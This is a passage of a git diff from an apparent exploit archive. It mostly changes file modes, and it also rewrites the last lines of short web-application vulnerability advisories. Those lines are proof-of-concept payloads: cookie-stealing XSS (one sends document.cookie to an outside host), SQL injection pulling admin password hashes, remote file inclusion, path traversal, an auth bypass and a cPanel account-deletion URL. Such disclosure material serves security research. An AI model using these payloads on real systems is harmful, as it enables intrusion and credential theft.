b/platforms/php/webapps/23933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23934.txt b/platforms/php/webapps/23934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23935.txt b/platforms/php/webapps/23935.txt old mode 100755 new mode 100644 index 0bab33c4d..20012aa27 --- a/platforms/php/webapps/23935.txt +++ b/platforms/php/webapps/23935.txt @@ -6,4 +6,4 @@ Exploitation could facilitate theft of cookie-based authentication credentials o This issue was reported in AzDGDatingLite 2.1.1. It is not known if earlier versions or commercial releases which share the same code base are affected, such as AzDGDatingPlatinum or AzDGDatingGold. -http://www.example.com/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/2394.php b/platforms/php/webapps/2394.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23947.txt b/platforms/php/webapps/23947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23948.txt b/platforms/php/webapps/23948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23949.txt b/platforms/php/webapps/23949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23950.txt b/platforms/php/webapps/23950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23951.txt b/platforms/php/webapps/23951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23952.txt b/platforms/php/webapps/23952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23953.txt b/platforms/php/webapps/23953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23954.txt b/platforms/php/webapps/23954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23955.txt b/platforms/php/webapps/23955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23956.txt b/platforms/php/webapps/23956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23957.txt b/platforms/php/webapps/23957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23958.txt b/platforms/php/webapps/23958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23959.txt b/platforms/php/webapps/23959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2396.txt b/platforms/php/webapps/2396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23960.txt b/platforms/php/webapps/23960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23961.txt b/platforms/php/webapps/23961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23962.txt b/platforms/php/webapps/23962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23963.txt b/platforms/php/webapps/23963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23964.txt b/platforms/php/webapps/23964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23965.txt b/platforms/php/webapps/23965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23966.txt b/platforms/php/webapps/23966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23967.txt b/platforms/php/webapps/23967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23971.txt b/platforms/php/webapps/23971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23972.txt b/platforms/php/webapps/23972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23973.txt b/platforms/php/webapps/23973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23974.txt b/platforms/php/webapps/23974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23975.txt b/platforms/php/webapps/23975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23976.txt b/platforms/php/webapps/23976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23977.txt b/platforms/php/webapps/23977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23978.txt b/platforms/php/webapps/23978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2398.txt b/platforms/php/webapps/2398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23982.txt b/platforms/php/webapps/23982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23983.txt b/platforms/php/webapps/23983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23984.txt b/platforms/php/webapps/23984.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23988.txt b/platforms/php/webapps/23988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2399.txt b/platforms/php/webapps/2399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23990.txt b/platforms/php/webapps/23990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23991.txt b/platforms/php/webapps/23991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23993.txt b/platforms/php/webapps/23993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23994.txt b/platforms/php/webapps/23994.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/23997.txt b/platforms/php/webapps/23997.txt old mode 100755 new mode 100644 index 6ef7eb77c..4d77540c7 --- a/platforms/php/webapps/23997.txt +++ b/platforms/php/webapps/23997.txt @@ -26,4 +26,4 @@ POST DATA: cart_order_id=*Attackers UserID*WEBID1&credit_card_processed=Y&total= The resulting query would be: UPDATE users SET balance = balance + 1, name=(SELECT database()) WHERE id = *Attackers User ID* -Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page \ No newline at end of file +Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page \ No newline at end of file diff --git a/platforms/php/webapps/23998.txt b/platforms/php/webapps/23998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24003.txt b/platforms/php/webapps/24003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24004.txt b/platforms/php/webapps/24004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24005.txt b/platforms/php/webapps/24005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24006.txt b/platforms/php/webapps/24006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24007.txt b/platforms/php/webapps/24007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24008.html b/platforms/php/webapps/24008.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24009.txt b/platforms/php/webapps/24009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24016.txt b/platforms/php/webapps/24016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2402.php b/platforms/php/webapps/2402.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24026.txt b/platforms/php/webapps/24026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24034.txt b/platforms/php/webapps/24034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24035.txt b/platforms/php/webapps/24035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24036.txt b/platforms/php/webapps/24036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24037.txt b/platforms/php/webapps/24037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24044.txt b/platforms/php/webapps/24044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24046.txt b/platforms/php/webapps/24046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24047.txt b/platforms/php/webapps/24047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24048.txt b/platforms/php/webapps/24048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2405.txt b/platforms/php/webapps/2405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24050.txt b/platforms/php/webapps/24050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24052.txt b/platforms/php/webapps/24052.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24053.txt b/platforms/php/webapps/24053.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24054.txt b/platforms/php/webapps/24054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24055.txt b/platforms/php/webapps/24055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24056.txt b/platforms/php/webapps/24056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24057.txt b/platforms/php/webapps/24057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24058.txt b/platforms/php/webapps/24058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24059.txt b/platforms/php/webapps/24059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2406.php b/platforms/php/webapps/2406.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24060.txt b/platforms/php/webapps/24060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24061.txt b/platforms/php/webapps/24061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24068.txt b/platforms/php/webapps/24068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2407.txt b/platforms/php/webapps/2407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24071.txt b/platforms/php/webapps/24071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24072.txt b/platforms/php/webapps/24072.txt old mode 100755 new mode 100644 index 14c0398cd..23d057570 --- a/platforms/php/webapps/24072.txt +++ b/platforms/php/webapps/24072.txt @@ -4,4 +4,4 @@ Coppermine Photo Gallery is reported prone to multiple input-validation vulnerab Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. -http://www.example.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);> \ No newline at end of file +http://www.example.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);> \ No newline at end of file diff --git a/platforms/php/webapps/24073.txt b/platforms/php/webapps/24073.txt old mode 100755 new mode 100644 index f80a39c6b..72e7fbc14 --- a/platforms/php/webapps/24073.txt +++ b/platforms/php/webapps/24073.txt @@ -4,4 +4,4 @@ Coppermine Photo Gallery is reported prone to multiple input-validation vulnerab Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. -http://www.example.com/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../.. \ No newline at end of file +http://www.example.com/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../.. \ No newline at end of file diff --git a/platforms/php/webapps/24074.txt b/platforms/php/webapps/24074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24075.txt b/platforms/php/webapps/24075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24082.txt b/platforms/php/webapps/24082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24083.txt b/platforms/php/webapps/24083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24086.txt b/platforms/php/webapps/24086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24087.txt b/platforms/php/webapps/24087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24088.txt b/platforms/php/webapps/24088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24089.txt b/platforms/php/webapps/24089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2409.txt b/platforms/php/webapps/2409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24090.txt b/platforms/php/webapps/24090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24091.txt b/platforms/php/webapps/24091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24092.txt b/platforms/php/webapps/24092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24099.txt b/platforms/php/webapps/24099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2410.txt b/platforms/php/webapps/2410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24100.txt b/platforms/php/webapps/24100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24104.txt b/platforms/php/webapps/24104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24108.txt b/platforms/php/webapps/24108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24124.txt b/platforms/php/webapps/24124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24126.txt b/platforms/php/webapps/24126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24127.txt b/platforms/php/webapps/24127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2413.txt b/platforms/php/webapps/2413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24131.txt b/platforms/php/webapps/24131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24134.txt b/platforms/php/webapps/24134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24138.txt b/platforms/php/webapps/24138.txt old mode 100755 new mode 100644 index c6843f624..0503ab79f --- a/platforms/php/webapps/24138.txt +++ b/platforms/php/webapps/24138.txt @@ -4,4 +4,4 @@ It is reported that e107 website system is prone to a remote HTML injection vuln The problem presents itself when a user supplies malicious HTML or script code to the application using a URI parameter of the log.php script. The application stores the injected HTML code, which is then rendered in the browser of an unsuspecting user whenever the log page of the affected site is viewed. -http://www.example.com/e107_plugins/log/log.php?referer=code<br>goes<here>&color=24&eself=http://www.example.com/stats.php&res=1341X1341 \ No newline at end of file +http://www.example.com/e107_plugins/log/log.php?referer=code<br>goes<here>&color=24&eself=http://www.example.com/stats.php&res=1341X1341 \ No newline at end of file diff --git a/platforms/php/webapps/2414.txt b/platforms/php/webapps/2414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2415.php b/platforms/php/webapps/2415.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24151.txt b/platforms/php/webapps/24151.txt old mode 100755 new mode 100644 index 6182cc7ab..01db9e601 --- a/platforms/php/webapps/24151.txt +++ b/platforms/php/webapps/24151.txt @@ -4,4 +4,4 @@ JPortal is reportedly affected by a remote SQL injection vulnerability in the pr As a result of this a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue. -http://www.example.com/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1 \ No newline at end of file +http://www.example.com/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1 \ No newline at end of file diff --git a/platforms/php/webapps/24152.txt b/platforms/php/webapps/24152.txt old mode 100755 new mode 100644 index 2e3b29783..5e0c8c816 --- a/platforms/php/webapps/24152.txt +++ b/platforms/php/webapps/24152.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/10435/info Land Down Under is prone to an HTML injection vulnerability. This issue is exposed through their BBCode implementation. Exploitation could permit theft of cookie credentials, manipulation of content, or other attacks. -[img]javascript:alert(document.cookie);[/img] \ No newline at end of file +[img]javascript:alert(document.cookie);[/img] \ No newline at end of file diff --git a/platforms/php/webapps/24153.txt b/platforms/php/webapps/24153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24154.txt b/platforms/php/webapps/24154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24157.txt b/platforms/php/webapps/24157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24166.txt b/platforms/php/webapps/24166.txt old mode 100755 new mode 100644 index 245cdb479..ad9adf534 --- a/platforms/php/webapps/24166.txt +++ b/platforms/php/webapps/24166.txt @@ -6,4 +6,4 @@ This issue will allow an attacker to gain access to sensitive scripts such as th http://www.example.com/admin/case/case.adminfaq.php/admin.php?op=FaqCatGo http://www.example.com/admin/admin.php/index.php -http://www.example.com/admin/modules/blocks.php/admin.php \ No newline at end of file +http://www.example.com/admin/modules/blocks.php/admin.php \ No newline at end of file diff --git a/platforms/php/webapps/24167.txt b/platforms/php/webapps/24167.txt old mode 100755 new mode 100644 index be870f06d..820b47e0f --- a/platforms/php/webapps/24167.txt +++ b/platforms/php/webapps/24167.txt @@ -8,4 +8,4 @@ From:<!--<>(-->John Doe<script>window.alert(document.cookie);</script><> From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><> -From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx;path=/';</script><> \ No newline at end of file +From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx;path=/';</script><> \ No newline at end of file diff --git a/platforms/php/webapps/24168.txt b/platforms/php/webapps/24168.txt old mode 100755 new mode 100644 index 5ff171b3d..018f6ec5e --- a/platforms/php/webapps/24168.txt +++ b/platforms/php/webapps/24168.txt @@ -4,4 +4,4 @@ Mail Manage EX is reportedly prone to a remote file include vulnerability. This This issue was discovered in Mail Manage EX 3.1.8. It is possible that previous versions are affected as well. -http://www.example.com/mail/mmex.php?Settings=http://www.example.com/malicious.php \ No newline at end of file +http://www.example.com/mail/mmex.php?Settings=http://www.example.com/malicious.php \ No newline at end of file diff --git a/platforms/php/webapps/24169.txt b/platforms/php/webapps/24169.txt old mode 100755 new mode 100644 index ccdcdf70d..d17b34e88 --- a/platforms/php/webapps/24169.txt +++ b/platforms/php/webapps/24169.txt @@ -5,4 +5,4 @@ CSLH is prone to multiple HTML injection vulnerabilities. These issues exist due Crafy Syntax Live Help 2.7.3 and prior versions are prone to these issues. window.location("http://www.cgisecurity.com/articles/xss-faq.shtml"); -window.location("http://livehelp.someisp.com/livehelp/operators.php?remove=1") \ No newline at end of file +window.location("http://livehelp.someisp.com/livehelp/operators.php?remove=1") \ No newline at end of file diff --git a/platforms/php/webapps/2417.php b/platforms/php/webapps/2417.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24172.txt b/platforms/php/webapps/24172.txt old mode 100755 new mode 100644 index ea1426139..d54b12386 --- a/platforms/php/webapps/24172.txt +++ b/platforms/php/webapps/24172.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/10468/info cPanel is prone to a vulnerability that can allow a remote authenticated administrator to delete customer account DNS information for customers that are not administered by that administrator. This attack can allow an attacker to cause a denial of service condition against vulnerable Web sites. -http://www.example.com:2086/scripts/killacct?domain=(domain)&user=(user)&submit-domain=Terminate \ No newline at end of file +http://www.example.com:2086/scripts/killacct?domain=(domain)&user=(user)&submit-domain=Terminate \ No newline at end of file diff --git a/platforms/php/webapps/24176.txt b/platforms/php/webapps/24176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24177.txt b/platforms/php/webapps/24177.txt old mode 100755 new mode 100644 index 5bf9769c7..f5ab2da46 --- a/platforms/php/webapps/24177.txt +++ b/platforms/php/webapps/24177.txt @@ -4,4 +4,4 @@ SurgeMail/WebMail is prone to multiple vulnerabilities. These issue result from SurgeMail versions 1.9 and prior and WebMail 3.1d are affected by these issues. -http://www.example.com:7080/<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com:7080/<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2418.php b/platforms/php/webapps/2418.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24180.txt b/platforms/php/webapps/24180.txt old mode 100755 new mode 100644 index ef0a70bb3..a8f7ac193 --- a/platforms/php/webapps/24180.txt +++ b/platforms/php/webapps/24180.txt @@ -25,4 +25,4 @@ # #Amirh03in # -############## \ No newline at end of file +############## \ No newline at end of file diff --git a/platforms/php/webapps/24183.txt b/platforms/php/webapps/24183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24186.txt b/platforms/php/webapps/24186.txt old mode 100755 new mode 100644 index 2a621e85f..b507758ab --- a/platforms/php/webapps/24186.txt +++ b/platforms/php/webapps/24186.txt @@ -10,4 +10,4 @@ Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versio *** There have been conflicting reports stating the the vulnerable variable only accepts integer values and not arbitrary strings. -http://www.example.com/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION] \ No newline at end of file +http://www.example.com/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/2419.txt b/platforms/php/webapps/2419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24191.txt b/platforms/php/webapps/24191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24192.txt b/platforms/php/webapps/24192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24193.txt b/platforms/php/webapps/24193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24194.txt b/platforms/php/webapps/24194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24199.txt b/platforms/php/webapps/24199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2420.txt b/platforms/php/webapps/2420.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24201.txt b/platforms/php/webapps/24201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24212.txt b/platforms/php/webapps/24212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24215.txt b/platforms/php/webapps/24215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24216.html b/platforms/php/webapps/24216.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24217.txt b/platforms/php/webapps/24217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2422.txt b/platforms/php/webapps/2422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24225.php b/platforms/php/webapps/24225.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24227.txt b/platforms/php/webapps/24227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24228.txt b/platforms/php/webapps/24228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24229.txt b/platforms/php/webapps/24229.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24231.txt b/platforms/php/webapps/24231.txt old mode 100755 new mode 100644 index d314e1209..e6bc1217a --- a/platforms/php/webapps/24231.txt +++ b/platforms/php/webapps/24231.txt @@ -8,4 +8,4 @@ An attacker may craft a URI that contains malicious HTML or script code. If a vi The attacker could use this vulnerability to steal cookie-based authentication credentials, or perform other types of attacks. -http://www.example.com/?rawURL=&lt;script&gt;javascript:alert();&lt;/script&gt; \ No newline at end of file +http://www.example.com/?rawURL=&lt;script&gt;javascript:alert();&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/24232.txt b/platforms/php/webapps/24232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24234.html b/platforms/php/webapps/24234.html old mode 100755 new mode 100644 index ac3edaebc..62e6f4dba --- a/platforms/php/webapps/24234.html +++ b/platforms/php/webapps/24234.html @@ -17,4 +17,4 @@ value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/> </form> &lt;script&gt; document.all.preview.click(); -&lt;/script&gt; \ No newline at end of file +&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/24235.txt b/platforms/php/webapps/24235.txt old mode 100755 new mode 100644 index 6b105f3c1..5446585a7 --- a/platforms/php/webapps/24235.txt +++ b/platforms/php/webapps/24235.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/10605/info Newsletter ZWS is reported prone to an administrative interface authentication bypass vulnerability. The vulnerability exists due to a design error in the implementation of the authentication system for the interface. The flaw allows a user to set their privileges through a URI parameter passed to the 'admin.php' script. -http://www.example.com/newsletter/admin.php?f=list_user&uname=test&ulevel=1 \ No newline at end of file +http://www.example.com/newsletter/admin.php?f=list_user&uname=test&ulevel=1 \ No newline at end of file diff --git a/platforms/php/webapps/24238.txt b/platforms/php/webapps/24238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24239.txt b/platforms/php/webapps/24239.txt old mode 100755 new mode 100644 index 89c122804..02964e902 --- a/platforms/php/webapps/24239.txt +++ b/platforms/php/webapps/24239.txt @@ -6,4 +6,4 @@ The problems present themselves when malicious HTML and script code is sent to t These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. -http://www.example.com/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/2424.txt b/platforms/php/webapps/2424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24240.txt b/platforms/php/webapps/24240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24241.txt b/platforms/php/webapps/24241.txt old mode 100755 new mode 100644 index 786d632e9..c9b8b2039 --- a/platforms/php/webapps/24241.txt +++ b/platforms/php/webapps/24241.txt @@ -8,4 +8,4 @@ Additionally, PowerPortal is prone to an information disclosure vulnerability. I The information disclosure vulnerability may be employed by the attacker in order to reveal potentially sensitive information regarding the layout of the filesystem on the affected computer. -http://www.example.com/modules.php?name=gallery&files=/../../../ \ No newline at end of file +http://www.example.com/modules.php?name=gallery&files=/../../../ \ No newline at end of file diff --git a/platforms/php/webapps/24255.txt b/platforms/php/webapps/24255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24256.php b/platforms/php/webapps/24256.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24257.txt b/platforms/php/webapps/24257.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24269.txt b/platforms/php/webapps/24269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2427.txt b/platforms/php/webapps/2427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24270.txt b/platforms/php/webapps/24270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24279.txt b/platforms/php/webapps/24279.txt old mode 100755 new mode 100644 index 8ca971ab4..d8c0580b3 --- a/platforms/php/webapps/24279.txt +++ b/platforms/php/webapps/24279.txt @@ -4,4 +4,4 @@ It is reported that Moodle is susceptible to a cross-site scripting vulnerabilit This issue may allow for theft of cookie-based authentication credentials. Other attacks are also possible. -http://www.example.com/help.php?file={XSS} \ No newline at end of file +http://www.example.com/help.php?file={XSS} \ No newline at end of file diff --git a/platforms/php/webapps/2428.txt b/platforms/php/webapps/2428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24289.c b/platforms/php/webapps/24289.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2429.txt b/platforms/php/webapps/2429.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24290.txt b/platforms/php/webapps/24290.txt old mode 100755 new mode 100644 index ae6c19710..63355a7b8 --- a/platforms/php/webapps/24290.txt +++ b/platforms/php/webapps/24290.txt @@ -8,4 +8,4 @@ An attacker can exploit this vulnerability by adding HTML code within URI argume Exploitation could permit an attacker to steal cookie-based authentication credentials or launch other attacks. -http://www.example.com/show_news.php?subaction=addcomment&name=UserName&comments=http://www.example.com&id=1078525267||1090074219|UserName|none|127.0.0.1|<script>alert("example");</script>|| \ No newline at end of file +http://www.example.com/show_news.php?subaction=addcomment&name=UserName&comments=http://www.example.com&id=1078525267||1090074219|UserName|none|127.0.0.1|<script>alert("example");</script>|| \ No newline at end of file diff --git a/platforms/php/webapps/24291.txt b/platforms/php/webapps/24291.txt old mode 100755 new mode 100644 index a6b5cf7ba..ea57f5e01 --- a/platforms/php/webapps/24291.txt +++ b/platforms/php/webapps/24291.txt @@ -6,4 +6,4 @@ An attacker may be able to inject HTML and script code into the application thro An attacker can exploit this issue to access an unsuspecting user's cookie-based authentication credentials and to retrieve personal email. Other attacks are also possible. -<IMG SRC="javasc&#X0A;ript:alert (document.cookie)";" border="0" height="1" width="1"> \ No newline at end of file +<IMG SRC="javasc&#X0A;ript:alert (document.cookie)";" border="0" height="1" width="1"> \ No newline at end of file diff --git a/platforms/php/webapps/24292.txt b/platforms/php/webapps/24292.txt old mode 100755 new mode 100644 index bccc1636a..e057645eb --- a/platforms/php/webapps/24292.txt +++ b/platforms/php/webapps/24292.txt @@ -7,4 +7,4 @@ Print Topic Mod version 1.0 is reported to be affected by this issue. http://www.example.com/printview.php?t={existing_topic's_id}&order_sql=UNION%20 SELECT%201%20,%20user_password%20,%201,%201,%201,%201,%201,%201,%201,%201,%201, %201%20FROM%20{phpbb_users_table}%20WHERE%20user_id%20={some_user's_id}%20ORDER -%20BY%20t.topic_id%20ASC \ No newline at end of file +%20BY%20t.topic_id%20ASC \ No newline at end of file diff --git a/platforms/php/webapps/24294.txt b/platforms/php/webapps/24294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24295.txt b/platforms/php/webapps/24295.txt old mode 100755 new mode 100644 index 5e7f45cf3..67985fb83 --- a/platforms/php/webapps/24295.txt +++ b/platforms/php/webapps/24295.txt @@ -14,4 +14,4 @@ The failure comes from saving passwords in a text file with php fwrite function, #exploit http://[url]/admin/userpwdadfasdfre.txt #-------------------------------------------------------------------------------------------# -#Thanks to : Luisfer ,Ivan sanchez, Juan carlos garcia \ No newline at end of file +#Thanks to : Luisfer ,Ivan sanchez, Juan carlos garcia \ No newline at end of file diff --git a/platforms/php/webapps/24296.txt b/platforms/php/webapps/24296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24301.html b/platforms/php/webapps/24301.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24303.txt b/platforms/php/webapps/24303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24306.txt b/platforms/php/webapps/24306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24307.txt b/platforms/php/webapps/24307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2431.txt 